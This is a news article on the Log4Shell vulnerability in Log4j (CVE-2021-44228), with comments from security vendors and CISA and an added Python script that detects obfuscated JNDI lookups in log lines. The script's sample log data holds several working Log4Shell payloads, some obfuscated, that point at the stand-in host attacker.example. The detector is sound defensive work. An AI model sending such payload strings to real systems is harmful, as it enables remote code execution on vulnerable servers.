Log4J vulnerability causes global panic

Because of its ubiquity, this recently discovered vulnerability will likely take a very long time to fully remediate, something malicious actors can use to their advantage. Countries around the world have issued warnings.

 


Dubbed “an industry nightmare” by Bleeping Computer, news of the new zero-day exploit for Log4j seems to have taken over the internet over the past few days. And while the Apache Software Foundation has already released an updated version, the extent of the damage done so far is still unclear, as is the damage still to come, since it may take organizations a considerable amount of time to patch the weakness.

Log4j is a highly popular Java-based open-source logging utility, used by countless applications and cloud services, including those of giants such as Microsoft (the weakness was first discovered in Minecraft) and Apple. The bug is tracked as CVE-2021-44228 and has been dubbed Log4Shell or LogJam.

In plain terms, as explained by Apache, an attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. In practice this means that any string an attacker can get logged, such as an HTTP header, may be interpreted by Log4j as a lookup expression and turned into a JNDI request to a server the attacker controls. The bug has a CVSS score of 10 out of 10, the maximum.
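As an added illustration of the lookup-substitution mechanism described above (this is example code written for this article, not code from Apache or from any of the companies quoted), the following script scans log lines for JNDI lookup expressions. Because Log4j resolves nested lookups innermost first, attackers obfuscate payloads with `${lower:...}`, `${upper:...}` and the `${key:-default}` default-value syntax; the script flattens those first, then checks for `${jndi:`. Assumptions: a `:-default` suffix is treated as resolving to its default (which is what obfuscated payloads rely on), and the sample log lines are constructed, not real traffic.

```python
import re

# Matches an innermost ${...} lookup: one whose body contains no nested ${ or }.
_INNER = re.compile(r"\$\{([^${}]*)\}")
# Once nested lookups are flattened, a JNDI lookup looks like ${jndi:<scheme>...}.
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _resolve(body: str):
    """Resolve the lookups an attacker can control without any server state.

    Returns the substituted text, or None when the lookup is left as-is
    (jndi itself, or env/sys/date lookups whose value we cannot know).
    Assumption: a ':-default' suffix resolves to the default, which is what
    obfuscated payloads rely on (they name keys that do not exist).
    """
    if ":-" in body:
        return body.split(":-", 1)[1]
    prefix, _, key = body.partition(":")
    prefix = prefix.strip().lower()
    if prefix == "lower":
        return key.lower()
    if prefix == "upper":
        return key.upper()
    return None


def normalize(text: str, max_rounds: int = 50) -> str:
    """Flatten nested/obfuscated lookups, innermost first, until nothing changes."""
    for _ in range(max_rounds):
        changed = False

        def sub(m):
            nonlocal changed
            resolved = _resolve(m.group(1))
            if resolved is None:
                return m.group(0)
            changed = True
            return resolved

        text = _INNER.sub(sub, text)
        if not changed:
            break
    return text


def is_jndi_lookup(text: str) -> bool:
    """True if the text, after de-obfuscation, contains a ${jndi:...} lookup."""
    return _JNDI.search(normalize(text)) is not None


def scan_log_lines(lines):
    """Return (line_number, normalized_line) for each line carrying a JNDI lookup."""
    hits = []
    for n, line in enumerate(lines, 1):
        norm = normalize(line)
        if _JNDI.search(norm):
            hits.append((n, norm))
    return hits


# Constructed sample lines (not real traffic): an access log in which the
# User-Agent header is later handed to a Log4j logger.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}${upper:n}di:${::-l}dap://attacker.example/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:04 +0000] "GET / HTTP/1.1" 200 512 "-" "${${env:NOPE:-j}ndi:${env:NOPE:-l}dap://attacker.example/a}"',
    '10.0.0.7 - - [10/Dec/2021:12:00:05 +0000] "GET /?q=${date:yyyy} HTTP/1.1" 200 512 "-" "curl/7.0"',
]

if __name__ == "__main__":
    for n, norm in scan_log_lines(SAMPLE_LOG):
        print(f"line {n}: {norm}")
```

Run against the sample, lines 2, 3 and 4 are flagged while the benign `${date:yyyy}` lookup on line 5 is not. A simple grep for the literal string `jndi` would miss lines 3 and 4, which is why the normalization step matters; a real deployment would feed the normalized string into the SIEM rather than printing it.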

“The weakness itself is very serious, for several reasons,” says Elad Rudich, Senior Product Manager at Torq, an Israeli-American startup that deals with security automation. “It exists in a ubiquitous library that has been around for a very long time, and so it is relatively difficult to identify and update all the places where it is located.

“Furthermore, this weakness can be exploited remotely relatively easily. So we’re talking about something very common, where it is difficult to identify breached locations. Significant work must be done – going from spot to spot in order to perform the necessary updates.”

In the US, CISA and its partners, through the Joint Cyber Defense Collaborative, have created a dedicated webpage to provide guidance and mitigation recommendations. “To be clear, this vulnerability poses a severe risk. We urge all organizations to join us in this essential effort and take action,” said Director Jen Easterly in a written statement.

Around the world, CERTs of multiple countries, from Israel to New Zealand, have issued warnings about this vulnerability and called on organizations to perform the necessary updates as quickly as possible.

But it gets worse, as patching the vulnerability alone will not be enough. Its scope is far too large, and the race between organizations hurrying to patch and malicious actors trying to wreak havoc before the security updates are installed, or in some cases pushing fake, malicious “patches” to users, will probably go on for a very long time, likely years.

“This is one of the most serious weaknesses we have seen in a long time, especially given the extensive use of the library and its Java projects,” says Ronen Selvin, CTO of Cycode. “We, as an industry, are much more prepared these days to deal with this type of threat. The importance of mapping the dependencies and directories that a company uses, and updating vulnerabilities, is well-known to any organization that works in software development.”

Note: this article was first published on December 12th, and was updated on December 14th with additional relevant information.
